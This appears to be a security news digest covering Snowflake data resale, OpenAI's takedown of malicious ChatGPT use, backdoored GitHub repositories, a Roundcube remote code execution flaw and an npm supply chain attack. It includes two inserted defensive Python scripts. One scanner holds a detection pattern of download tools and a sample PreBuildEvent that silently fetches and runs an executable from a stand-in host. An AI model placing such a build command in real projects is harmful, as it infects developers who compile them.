Extortion Group Briefly Resells Old Ticketmaster Data Stolen in 2024 Snowflake Attacks
OpenAI Shuts Down 10 Malicious Operations Using ChatGPT for Cyber Attacks and Disinformation
Single Threat Actor Behind 100+ Backdoored GitHub Repositories Targeting Cybercriminals
Over 84,000 Roundcube Webmail Instances Exposed to Critical Remote Code Execution Flaw
Massive Supply Chain Attack Targets npm and PyPI Ecosystems, Affecting Nearly One Million Weekly Downloads
Extortion Group Briefly Resells Old Ticketmaster Data Stolen in 2024 Snowflake Attacks
The Arkana Security extortion gang caused a brief stir over the weekend when they advertised what appeared to be newly stolen Ticketmaster data for sale, but cybersecurity investigators have determined the 569 GB of data being offered is actually recycled from the massive 2024 Snowflake data theft attacks. The group posted screenshots of the allegedly stolen information on social media, leading to initial speculation that Ticketmaster had suffered a new security breach.
However, analysis by BleepingComputer revealed that the files shown in Arkana's listing matched samples from the original Snowflake attacks that targeted multiple major organizations last year. A key indicator was one image caption reading "rapeflaked copy 4 quick sale 1 buyer," referencing RapeFlake, a custom reconnaissance and data exfiltration tool specifically created by the original threat actors to target Snowflake databases. This connection strongly suggests Arkana was attempting to resell previously stolen data rather than offering fresh breach material.
The original Snowflake attacks, claimed by the extortion group ShinyHunters, compromised numerous high-profile organizations including Santander, AT&T, Advance Auto Parts, Neiman Marcus, and Ticketmaster through stolen credentials obtained via infostealers. Ticketmaster became one of the most extensively extorted victims, with threat actors stealing personal and ticketing information before escalating their demands by releasing alleged print-at-home tickets and purported Taylor Swift concert tickets on hacking forums.
The Arkana listing has since been removed from their data leak site as of June 9, though it remains unclear whether the group previously purchased the data, consists of former threat actors involved in the original breach, or is working in partnership with ShinyHunters.
OpenAI Shuts Down 10 Malicious Operations Using ChatGPT for Cyber Attacks and Disinformation
OpenAI has terminated accounts linked to 10 malicious campaigns that exploited ChatGPT for various nefarious activities, including fake IT worker schemes, disinformation operations, malware development, and social engineering attacks targeting organizations worldwide. The AI company's threat intelligence report reveals that nearly half of these operations likely originated from China, with additional campaigns attributed to Russian and North Korean-linked actors who leveraged the language model to enhance their cyber capabilities and reach.
Among the most notable operations were fake IT worker campaigns consistent with North Korean schemes, where threat actors used ChatGPT to craft sophisticated application materials for remote software engineering positions. These campaigns went beyond creating fake personas with fabricated employment histories, expanding to auto-generate resumes and establish recruiting networks that included operators in Africa posing as job applicants and individuals in North America running laptop farms. The activities mirror previous documented cases where North Korean operatives infiltrated US companies to generate revenue while maintaining access to corporate networks.
Russian-backed accounts were caught using ChatGPT to generate German-language disinformation content about Germany's 2025 election, distributing propaganda through Telegram channels and social media platforms with tens of thousands of followers. In a particularly sophisticated operation, a Russian-speaking individual used ChatGPT to develop Windows malware called ScopeCreep, employing careful operational security practices by using temporary email addresses and limiting each account to single conversations about incremental code improvements. The malware, designed to steal browser credentials and tokens, was distributed through a fake gaming tool repository but ultimately saw only limited adoption.
Chinese government-backed operators represented the largest segment of malicious activity, with accounts linked to APT5 and APT15 using ChatGPT to generate massive volumes of social media content across platforms like TikTok, Facebook, and Reddit. The content focused primarily on Taiwan, American politics, and pro-Chinese Communist Party narratives in both English and Chinese. These operators also leveraged the AI for technical support including open-source research, script development, system troubleshooting, and infrastructure setup involving VPNs, Docker containers, and reconnaissance frameworks, though OpenAI noted the assistance didn't provide capabilities beyond publicly available resources.
Single Threat Actor Behind 100+ Backdoored GitHub Repositories Targeting Cybercriminals
Sophos researchers have traced more than a hundred backdoored malware repositories on GitHub to a single Russian threat actor using the identifier "ischhfd83," who has been systematically targeting novice cybercriminals and video game cheaters seeking malicious code. The investigation began when a Sophos customer inquired about Sakura RAT, a supposedly sophisticated remote access trojan that gained attention through tech journalism and social media posts in April, only to discover it was actually a backdoored version that infected would-be attackers with additional malware.
Analysis revealed that Sakura RAT was largely copied from AsyncRAT, a widely used cybercriminal tool, but with many forms left empty to prevent proper functionality while secretly installing infostealers and other malicious software on the user's device. The backdoor was implemented through a PreBuild event in the Visual Basic project file that silently downloaded malware during compilation. This same technique was found across 111 of the 141 repositories linked to the ischhfd83 email address, with 133 repositories containing some form of backdoor functionality targeting unsuspecting users.
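The PreBuild-event technique described above is easy to audit for before opening a downloaded project in an IDE. The following scanner is an added example (not Sophos's tooling): it walks an MSBuild project file and flags PreBuildEvent, PostBuildEvent or Exec commands that fetch or launch remote content; the SAMPLE_VBPROJ text is constructed for illustration.

```python
"""Scan an MSBuild project file (.vbproj/.csproj) for PreBuildEvent,
PostBuildEvent or Exec commands that fetch or launch remote content.
Added example, not Sophos's tooling; SAMPLE_VBPROJ is constructed."""
import re
import xml.etree.ElementTree as ET

# Tokens that indicate a build event is downloading or launching a payload.
SUSPICIOUS = re.compile(
    r"(powershell|pwsh|cmd\s*/c|curl|wget|certutil|bitsadmin|mshta|"
    r"Invoke-WebRequest|iwr|DownloadString|DownloadFile|Net\.WebClient|"
    r"https?://|FromBase64String|-EncodedCommand|-enc\b)",
    re.IGNORECASE,
)

def build_event_findings(project_xml: str) -> list[dict]:
    """Return one finding per build event whose command matches SUSPICIOUS.
    A clean project yields an empty list."""
    findings = []
    for elem in ET.fromstring(project_xml).iter():
        tag = elem.tag.split("}")[-1]  # drop the MSBuild XML namespace
        if tag in ("PreBuildEvent", "PostBuildEvent"):
            cmd = (elem.text or "").strip()
        elif tag == "Exec":  # <Exec Command="..."/> inside a <Target>
            cmd = elem.get("Command", "").strip()
        else:
            continue
        hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
        if hits:
            findings.append({"event": tag, "command": cmd, "indicators": hits})
    return findings

# Constructed project: a benign post-build copy next to a pre-build event
# that downloads and runs an executable before the build itself completes.
SAMPLE_VBPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <PreBuildEvent>powershell -w hidden -c "iwr http://example.invalid/x.exe -OutFile $(TEMP)\\x.exe; start $(TEMP)\\x.exe"</PreBuildEvent>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)dist\\"</PostBuildEvent>
  </PropertyGroup>
</Project>"""

if __name__ == "__main__":
    for f in build_event_findings(SAMPLE_VBPROJ):
        print(f"{f['event']}: {f['indicators']}\n  {f['command']}")
```

Run it over every `*.vbproj` and `*.csproj` in a cloned repository before building; a legitimate project rarely needs a build event that reaches out to the network at all.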
The malicious repositories were carefully crafted to appear legitimate, with 58 percent marketed as video game cheats and 24 percent disguised as malware projects, exploits, or attack tools. The threat actor used GitHub Actions workflows to automate thousands of commits, with some repositories registering nearly 60,000 commits in just a few months to create the illusion of active development. However, closer inspection revealed telltale signs of the deception, including repositories with few contributors who had no projects of their own, similar usernames with minor character variations, and contributors who only worked on projects within the same network.
Sophos linked this campaign to previous research by security firms including Checkmarx, Trend Micro, Kaspersky, and Check Point, characterizing it as part of a broader distribution-as-a-service operation that has been active since at least 2022. While the exact distribution methods remain unclear, previous investigations have identified Discord and YouTube as primary channels for spreading links to these malicious GitHub projects. The campaign represents a rare example of cybercriminals targeting their own community, though researchers warn that inexperienced open source enthusiasts could easily be deceived by the automated commits and professional appearance of these repositories.
Over 84,000 Roundcube Webmail Instances Exposed to Critical Remote Code Execution Flaw
https://fearsoff.org/research/roundcube
More than 84,000 Roundcube webmail installations worldwide remain vulnerable to CVE-2025-49113, a critical remote code execution flaw that affects versions spanning over a decade and has already been exploited by cybercriminals who developed working exploits shortly after the patch was released. The vulnerability, discovered by security researcher Kirill Firsov, impacts Roundcube versions 1.1.0 through 1.6.10 and was patched on June 1, 2025, but the slow adoption of security updates has left tens of thousands of instances exposed to active exploitation attempts.
The flaw stems from unsanitized input in the $_GET['_from'] parameter that enables PHP object deserialization and session corruption when session keys begin with an exclamation mark. While the vulnerability requires authentication to exploit, attackers have claimed they can obtain valid credentials through various methods including cross-site request forgery attacks, log scraping, or brute force attempts. The technical details of the vulnerability have been publicly disclosed, and hackers quickly reverse-engineered the patch to create exploits that are being sold on underground forums, significantly increasing the risk of widespread attacks.
According to The Shadowserver Foundation's internet scanning data, the 84,925 vulnerable instances are distributed globally with the highest concentrations in the United States with 19,500 vulnerable installations, followed by India with 15,500, Germany with 13,600, France with 3,600, Canada with 3,500, and the United Kingdom with 2,400. The widespread deployment of Roundcube across shared hosting providers like GoDaddy, Hostinger, and OVH, as well as in government, education, and technology sectors, amplifies the potential impact of successful exploitation attempts.
System administrators are strongly urged to immediately update to patched versions 1.6.11 or 1.5.10 to address the vulnerability. For organizations unable to upgrade immediately, security experts recommend implementing temporary mitigation measures including restricting webmail access, disabling file uploads, adding cross-site request forgery protection, blocking risky PHP functions, and monitoring for indicators of exploitation attempts. The combination of public exploit availability, widespread vulnerable installations, and the critical nature of the flaw makes this a high-priority security issue requiring immediate attention from webmail administrators worldwide.
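Two of the checks recommended above, deciding whether an installed version falls in the stated vulnerable range and monitoring webmail access logs for malformed `_from` parameters, as an added example (not Roundcube's or the researcher's code). The version bounds are the ones stated in the text; the log lines are constructed, with documentation-range IP addresses.

```python
"""Two defender checks for the Roundcube flaw: which installed versions
fall in the stated vulnerable range, and which access-log requests carry a
malformed _from parameter. Added example, not Roundcube's code; the log
lines are constructed and the IPs are documentation ranges."""
import re
from urllib.parse import parse_qs, urlsplit

def parse_version(v: str) -> tuple[int, ...]:
    """'1.6.10' -> (1, 6, 10); tolerates suffixes like '1.6.10-1~deb'."""
    return tuple(int(p) for p in re.findall(r"\d+", v)[:3])

def is_vulnerable(version: str) -> bool:
    """Vulnerable range per the advisory: 1.1.0 through 1.6.10, with
    1.5.10 and 1.6.11 as the first fixed releases on their branches."""
    v = parse_version(version)
    if v < (1, 1, 0) or v >= (1, 7):
        return False
    if v[:2] == (1, 5):
        return v < (1, 5, 10)
    return v < (1, 6, 11)

# Legitimate Roundcube links carry plain token values in _from; anything else
# (notably a leading '!', which the advisory ties to session corruption) is
# worth an alert. Allowlisting catches encoded variants once parse_qs decodes.
FROM_OK = re.compile(r"^[A-Za-z0-9_-]*$")
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP')

def suspicious_from_requests(log_lines) -> list[tuple[str, str]]:
    """Return (client_ip, decoded _from value) for each request whose
    _from parameter fails the allowlist."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
        hits.extend((ip, val) for val in qs.get("_from", []) if not FROM_OK.match(val))
    return hits

# Constructed combined-format access log lines.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jun/2025:10:01:02 +0000] "GET /?_task=settings&_action=edit-identity&_from=edit-identity HTTP/1.1" 200 512',
    '198.51.100.9 - - [07/Jun/2025:10:01:05 +0000] "GET /?_task=settings&_from=%21probe HTTP/1.1" 200 77',
    '203.0.113.5 - - [07/Jun/2025:10:02:00 +0000] "GET /?_task=mail&_mbox=INBOX HTTP/1.1" 200 9021',
]

if __name__ == "__main__":
    print("1.6.10 vulnerable:", is_vulnerable("1.6.10"))
    print(suspicious_from_requests(SAMPLE_LOG))
```

Because the flaw requires authentication, a flagged request also names a session whose credentials should be treated as compromised and rotated.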
Massive Supply Chain Attack Targets npm and PyPI Ecosystems, Affecting Nearly One Million Weekly Downloads
https://www.aikido.dev/blog/supply-chain-attack-on-react-native-aria-ecosystem
Cybersecurity researchers have uncovered a sophisticated supply chain attack targeting over a dozen packages associated with GlueStack, delivering malware to developers worldwide. The malicious code, which was introduced through modifications to the "lib/commonjs/index.js" file, grants attackers the ability to execute shell commands, capture screenshots, and upload files from infected systems. These compromised packages collectively account for nearly one million weekly downloads, representing a significant threat to the global software development community.
The attack was first detected on June 6, 2025, at 9:33 p.m. GMT, affecting seventeen different packages within the React Native Aria ecosystem. The malware bears striking similarities to a remote access trojan discovered in another compromised npm package called "rand-user-agent" last month, suggesting the same threat actors may be orchestrating multiple supply chain campaigns. The trojan includes enhanced capabilities for harvesting system information and identifying public IP addresses of infected hosts, demonstrating an evolution in the attackers' techniques.
Concurrent with this discovery, security researchers identified additional malicious packages on both npm and PyPI repositories. Two rogue npm packages masquerading as legitimate utilities were found to contain wipers capable of deleting entire application directories, while a Python package disguised as an Instagram growth tool was harvesting user credentials and distributing them across ten different bot services. The npm packages used sophisticated techniques including email-based covert communication channels and platform-specific destruction commands, while the Python malware implemented remote kill switches and Base64 encoding to evade detection.
Project maintainers have responded by revoking compromised access tokens and marking affected versions as deprecated, but the incident highlights the persistent nature of these attacks. Security experts warn that attackers maintain access to infected machines even after packages are updated, emphasizing the massive scale of potential impact. The emergence of these destructive packages represents a concerning shift from traditional financially motivated attacks toward system sabotage, marking a new chapter in supply chain security threats that could affect millions of developers and organizations worldwide.